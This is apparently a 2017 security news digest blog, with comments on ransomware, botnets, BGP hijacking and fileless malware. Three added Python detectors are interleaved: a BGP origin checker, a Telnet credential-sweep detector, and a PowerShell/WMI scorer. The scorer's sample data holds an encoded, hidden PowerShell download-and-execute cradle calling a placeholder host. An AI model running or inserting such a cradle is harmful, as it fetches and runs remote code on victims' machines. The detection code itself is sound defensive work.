Stealth tracking, double-agents, and de-bugging gone horribly wrong

Ultrasonic Beacons Are Tracking Your Every Movement
More than 200 Android mobile applications listen surreptitiously for ultrasonic beacons embedded in audio that are used to track users and serve them with targeted advertising. | threatpost.com

[Comment] SilverPush continues to be installed in apps with millions of downloads. What is most worrisome is that Google requires that developers “disclose how an app collects, uses and shares user data, including the types of parties with whom it’s shared.” Want a more in-depth view? The research paper is available.

‘Crazy bad’ bug in Microsoft’s Windows malware scanner can be used to install malware
Critical update for security engine rushed out the door. | theregister.co.uk

[Comment] Say it isn’t so – if Microsoft’s Malware Protection Engine scans a specially crafted file it can allow remote code execution (ironic). Thankfully, Microsoft moved quickly on this with an emergency update. Another ‘win’ for Project Zero.

Beware! Built-in Keylogger Discovered In Several HP Laptop Models
Security researchers discover a built-in keylogger in the Conexant High-Definition audio driver pre-installed on several Hewlett-Packard (HP) laptop models. | thehackernews.com

[Comment] Why does an audio driver need a keylogger? Keystrokes recorded and left in cleartext in a file on the device? It smacks of pre-installed spyware.
Posted in Uncategorized

EPT, Chipsets, and Reroutes

In Defense of Offensive Hacking Tools
8 points in defence of offence. | medium.com

[Comment] The cyber threat landscape has become blurred and is outpacing our ability to adequately quantify the threat. The new reality we currently face is that sophisticated attack tools, exploits, and vulnerability knowledge are all becoming democratized. Let’s call it the Effective Persistent Threat (EPT).

The hijacking flaw that lurked in Intel chips is worse than anyone thought
Patch for severe authentication bypass bug won’t be available until next week. | arstechnica.com

[Comment] Shodan searches show that the number of Internet-facing systems with the bug is limited in comparison with the sheer number of devices with this chipset – so it could be much worse. We do need to ask ourselves how something so fundamental in our computing devices could contain such a flaw for so long.

Russian-controlled telecom hijacks financial services’ Internet traffic
Visa, MasterCard, and Symantec among dozens affected by “suspicious” BGP mishap. | arstechnica.com

[Comment] BGP is essential to the Internet but was never designed with security in mind. Where have I heard that before? Financial institutions …. sure, we have SSL, no problem. How many password resets were done during those seven minutes?
Posted in Musings
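The post’s point is that BGP accepts whatever an AS announces; the check below is an added example (not from the post or the linked article) of what a defender can do about it: compare observed announcements against an allow-list of expected origin ASes, in the spirit of RPKI route-origin validation, and flag a wrong origin or a more-specific carve-out of a protected prefix. Every prefix, AS number and announcement here is constructed sample data, and the verdict names are assumptions.

```python
"""Route-origin sanity check over a batch of constructed BGP announcements."""
import ipaddress

# Constructed allow-list: which origin ASes may announce each prefix.
# RFC 5737 documentation prefixes and private-range AS numbers only.
EXPECTED_ORIGINS = {
    "203.0.113.0/24": {64500},   # constructed "bank A" prefix
    "198.51.100.0/24": {64501},  # constructed "card network" prefix
}

# Constructed announcements as a route collector would see them:
# (prefix, AS path); the origin AS is the last element of the path.
SAMPLE_ANNOUNCEMENTS = [
    ("203.0.113.0/24", [64502, 64500]),   # legitimate origin
    ("198.51.100.0/24", [64503, 64501]),  # legitimate origin
    ("203.0.113.0/25", [64504, 64505]),   # more-specific carve-out, foreign origin
    ("198.51.100.0/24", [64504, 64505]),  # same prefix, wrong origin
    ("192.0.2.0/24", [64506, 64507]),     # not a prefix we protect
]


def covering_prefix(prefix, protected):
    """Return the protected prefix that contains `prefix`, or None."""
    net = ipaddress.ip_network(prefix)
    for p in protected:
        pnet = ipaddress.ip_network(p)
        if net.version == pnet.version and net.subnet_of(pnet):
            return p
    return None


def check_announcements(announcements, expected=EXPECTED_ORIGINS):
    """Classify each announcement as (prefix, origin_as, verdict).

    verdict: 'valid', 'invalid-origin', 'more-specific' or 'unknown'.
    """
    results = []
    for prefix, as_path in announcements:
        origin = as_path[-1]
        parent = covering_prefix(prefix, expected)
        if parent is None:
            results.append((prefix, origin, "unknown"))
        elif origin in expected[parent]:
            # The owner may deaggregate its own space; that is fine.
            results.append((prefix, origin, "valid"))
        elif prefix != parent:
            # Longest match wins in every router, so a foreign-origin
            # more-specific steals the traffic even if the real route stays up.
            results.append((prefix, origin, "more-specific"))
        else:
            results.append((prefix, origin, "invalid-origin"))
    return results


def alerts(announcements, expected=EXPECTED_ORIGINS):
    """Only the verdicts a NOC would actually page on."""
    return [r for r in check_announcements(announcements, expected)
            if r[2] in ("invalid-origin", "more-specific")]


if __name__ == "__main__":
    for prefix, origin, verdict in check_announcements(SAMPLE_ANNOUNCEMENTS):
        print(f"{prefix:18} origin AS{origin:<6} {verdict}")
```

A real deployment would take the allow-list from signed ROAs and the announcements from a route collector feed; the comparison logic is the same.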

Elections, Geo-aware malware, and SS7 vs. 2FA

Hackers emit 9GB of stolen Macron ’emails’ two days before French presidential election
Hmm, who could possibly do such a thing? | theregister.co.uk

‘Fatboy’ Ransomware Extorts Money Based on Victims’ Countries
Cybersecurity researchers have discovered a new variant of ransomware that automatically adjusts its ransom demand from victims based on their location. Targets in wealthier countries will be forced to pay… | lifars.com

After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts
O2 confirms online thefts using stolen 2FA SMS codes. | theregister.co.uk

Posted in Musings

May 5th, 2017 | The 3Ps: Phishing, Patching, and Passwords

Phishing – Google Docs and New Tactics

Patching – Intel

Passwords – World Password Day + Timely Guidance from NIST

Posted in Uncategorized

May 1, 2017 | Threat Reports

DBIR 2017:

Highlights include:

  • 88% of breaches fall into the nine patterns we first identified back in 2014.
  • 95% of phishing attacks that led to a breach were followed by some sort of software installation.
  • In the 2014 DBIR, ransomware was the 22nd most common form of malware. This year it’s number five, and the most common in the Crimeware pattern.

FireEye M-trends:

Highlights include:

  • The global median time from compromise to discovery has dropped significantly, from 146 days in 2015 to 99 days in 2016.
  • Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two.
[Comment] Trends and more trends – I am a big fan of Verizon’s DBIR reports.

Posted in Uncategorized

April 29, 2017 | Vigilantes, Disclosure fall-out, and Malware Upgrades

Vigilantes – Hajime

Hajime IoT worm fights the Mirai botnet for control of easy-to-hack IoT products. Hajime, like Mirai before it, takes advantage of factory-set (default) username and password combinations to brute-force its way into unsecured devices with open Telnet ports. Analysis from Rapidity Networks is found here.

Related posts.

  • Mirai and Hajime Locked Into IoT Botnet Battle. threatpost
  • Hajime, the mysterious evolving botnet. SecureList
  • Hajime Botnet is Now 300,000-Strong. infosecurity-magazine
  • Hajime Botnet Reaches 300,000 Hosts With No Malicious Functions. darknet
  • A vigilante is putting a huge amount of work into infecting IoT devices. arstechnica
[Comment] We need to ask ourselves: (1) why do we make it so easy for compromises to happen by not bothering to change default usernames and passwords, and (2) Telnet! Hard-coded passwords! Are you serious? Let’s demand more basic security from these IoT products.
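The Mirai/Hajime sweep described above leaves a recognisable trace on the device: a burst of Telnet login failures for the usual factory account names from one source, followed by a success. The detector below is an added example, not from the post or from Rapidity Networks’ analysis; the log lines are constructed to look like a router’s syslog, the addresses are RFC 5737 documentation space, and the field layout, threshold and window size are assumptions.

```python
"""Spotting default-credential guessing against Telnet in constructed device logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines: a sweep from 192.0.2.10 and an innocent typo from
# 198.51.100.7 that retries 45 minutes later.
SAMPLE_LOG = """\
2017-04-28T02:14:01Z telnetd: login failed for 'admin' from 192.0.2.10
2017-04-28T02:14:02Z telnetd: login failed for 'root' from 192.0.2.10
2017-04-28T02:14:02Z telnetd: login failed for 'support' from 192.0.2.10
2017-04-28T02:14:03Z telnetd: login failed for 'user' from 192.0.2.10
2017-04-28T02:14:04Z telnetd: login failed for 'admin' from 192.0.2.10
2017-04-28T02:14:05Z telnetd: login ok for 'root' from 192.0.2.10
2017-04-28T02:20:11Z telnetd: login failed for 'admin' from 198.51.100.7
2017-04-28T03:05:44Z telnetd: login ok for 'admin' from 198.51.100.7
"""

# Assumed line format; adjust the pattern to the device's real syslog.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnetd: login (?P<result>failed|ok) for "
    r"'(?P<user>[^']*)' from (?P<src>\S+)$"
)

FAIL_THRESHOLD = 5             # this many failures ...
WINDOW = timedelta(seconds=60)  # ... inside this window counts as a sweep


def parse(log_text):
    """Return (timestamp, src, user, success) tuples, skipping unparsable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["user"], m["result"] == "ok"))
    return events


def find_credential_sweeps(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Map each sweeping source to its failure count, the usernames tried and
    whether a login succeeded at or after the burst (i.e. the device fell)."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        fails = [ev for ev in evs if not ev[3]]
        # Slide a window of `threshold` consecutive failures over the timeline.
        for i in range(len(fails)):
            j = i + threshold - 1
            if j < len(fails) and fails[j][0] - fails[i][0] <= window:
                burst_end = fails[j][0]
                fell = any(ev[3] and ev[0] >= burst_end for ev in evs)
                findings[src] = {
                    "failures": len(fails),
                    "users": sorted({ev[2] for ev in fails}),
                    "compromised": fell,
                }
                break
    return findings


if __name__ == "__main__":
    for src, info in find_credential_sweeps(parse(SAMPLE_LOG)).items():
        state = "LOGIN SUCCEEDED" if info["compromised"] else "blocked"
        print(f"{src}: {info['failures']} failures, users {info['users']}, {state}")
```

The success-after-burst rule matters more than the raw failure count: a device that merely gets probed is noise, a device that then accepts one of the factory credentials is the one that needs its password changed and Telnet turned off.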

Disclosure fall-out – ShadowBrokers

  1. Script kiddie bonanza – exploit code is released and scans show tens of thousands of Windows servers infected with the DoublePulsar kernel exploit.
  2. SWIFT – exploiting global financial messaging, how many service bureaus were compromised?
  3. Microsoft anticipatory patches – how did Microsoft patch so quickly, before the disclosure no less? Did the NSA tip Microsoft off on the extent/particulars of the disclosure?
  4. EOL – thousands of vulnerable systems, with no patch available from Microsoft, are now being actively exploited.

Related posts.

  • Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs. thehackernews
  • NSA’s DoublePulsar Kernel Exploit in use Internet-wide. threatpost
  • Tens of thousands Windows systems implanted with NSA’s DoublePulsar. helpnetsecurity
  • NSA-leaking Shadow Brokers just dumped its most damaging release yet. arstechnica
  • Protecting customers and evaluating risk. Microsoft Technet
  • Microsoft Says It Has Patched Leaked NSA Hacks. Fortune
[Comment] The unintended fallout of this is that a few of these exploits target systems that are EOL. Thus, no patches are available. Now you would think that doesn’t matter; after all, who would still have EOL systems facing the Internet?

Upgrades – Fileless malware

So why is fileless malware so dangerous, and why will it continue to expand for the foreseeable future? In simple terms: it works. Although there are a number of good malware detection systems that are capable of detecting and controlling fileless malware, most are not.

Related Posts.

  • Hard Target: Fileless Malware. threatpost
  • Why Fileless Malware will Continue Its Rapid Expansion. lastline
  • Will Fileless Malware Push the antivirus Industry into Oblivion? helpnetsecurity
[Comment] Fileless malware is stealthy: techniques such as polymorphism, implanting watchdogs and revoking permissions are being used in an effort to evade detection. Coupled with this is the abuse of built-in features like Windows Management Instrumentation (WMI) and Windows PowerShell to blend into the network noise and compromise endpoints without ever storing a binary on disk, ensuring that attacks remain hard to detect and track.
Posted in Weekly Posts
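Because nothing lands on disk, the place to catch the WMI/PowerShell tradecraft described above is process-creation telemetry (command-line auditing, Sysmon process-create events). The scorer below is an added example, not from the post or the linked articles: each record is a constructed, simplified process-creation event, and the detector looks for encoded commands, hidden windows, in-memory download-and-execute and remote process creation via wmic, decoding the base64 payload so encoding does not hide the download stage. The rule names, weights, parent-process list and alert threshold are assumptions.

```python
"""Scoring fileless-malware indicators in constructed process-creation events."""
import base64
import re

# Constructed events: (parent image, image, command line). The URL host is
# the reserved .invalid TLD, so the sample resolves to nothing.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem C:\\Users"),
    ("winword.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -EncodedCommand "
     + base64.b64encode(_CRADLE.encode("utf-16le")).decode()),
    ("cmd.exe", "wmic.exe",
     "wmic /node:HOST01 process call create \"powershell -nop -w hidden -c Get-Process\""),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# (rule name, pattern, weight); weights are an assumption for this example.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    ("download_exec", re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile", re.I), 3),
    ("wmi_process_create", re.compile(r"\bwmic\b.*process\s+call\s+create", re.I), 3),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ALERT_SCORE = 4


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent, image, cmdline):
    """Return (score, matched rule names) for one process-creation event.

    The decoded payload is appended to the text that the rules scan, so an
    encoded download cradle still trips `download_exec`.
    """
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += "\n" + decoded
    matched = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(w for name, _, w in RULES if name in matched)
    # An Office application spawning PowerShell is the classic macro-to-fileless hop.
    if image.lower() == "powershell.exe" and parent.lower() in OFFICE_PARENTS:
        matched.append("office_spawned_powershell")
        score += 3
    return score, matched


def alerts(events, threshold=ALERT_SCORE):
    """Events whose score reaches the threshold, as (image, score, rules)."""
    out = []
    for parent, image, cmdline in events:
        score, matched = score_event(parent, image, cmdline)
        if score >= threshold:
            out.append((image, score, matched))
    return out


if __name__ == "__main__":
    for image, score, matched in alerts(SAMPLE_EVENTS):
        print(f"{image}: score {score}, rules {matched}")
```

The benign first event (an interactive directory listing) and the service host score zero; the Office-spawned encoded cradle and the remote wmic process creation are the two that would page. Tune the weights against your own baseline, since some administration scripts legitimately use `-nop` and `-w hidden`.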